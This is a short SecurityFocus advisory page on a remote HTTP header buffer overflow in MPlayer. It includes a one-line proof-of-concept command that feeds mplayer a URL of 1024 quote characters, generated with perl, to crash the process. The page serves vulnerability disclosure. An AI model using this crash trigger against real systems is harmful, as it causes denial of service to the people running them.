MPlayer Remote HTTP Header Buffer Overflow Vulnerability

The following proof of concept has been provided:

Issuing the following command will cause the affected process to crash:
$ mplayer http://`perl -e 'print "\""x1024;'`

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus